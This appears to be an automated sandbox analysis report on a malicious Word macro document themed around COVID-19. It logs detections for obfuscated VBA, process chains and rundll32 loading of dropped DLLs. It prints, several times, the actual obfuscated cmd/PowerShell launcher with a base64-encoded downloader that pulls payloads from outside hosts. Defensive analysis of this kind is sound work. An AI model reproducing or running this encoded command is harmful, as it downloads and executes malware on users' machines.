JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM
Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdbg source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbc source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbE source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2107605290.0000000001E67000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2120130538.000000001B900000.00000002.00000001.sdmp
Source: AG60273928I_COVID-19_SARS-CoV-2.docInitial sample: OLE summary subject = Licensed Borders Strategist Brook Designer sky blue overriding neural auxiliary Ergonomic Metal Pants International Solutions withdrawal Associate

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
Source: AG60273928I_COVID-19_SARS-CoV-2.docStream path 'Macros/VBA/Wnoyuuu28ekk6591v' : High number of GOTO operations
Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Wnoyuuu28ekk6591v
Document contains an embedded VBA with many randomly named variablesShow sources
Source: AG60273928I_COVID-19_SARS-CoV-2.docStream path 'Macros/VBA/Wnoyuuu28ekk6591v' : High entropy of concatenated variable names
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIA
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJ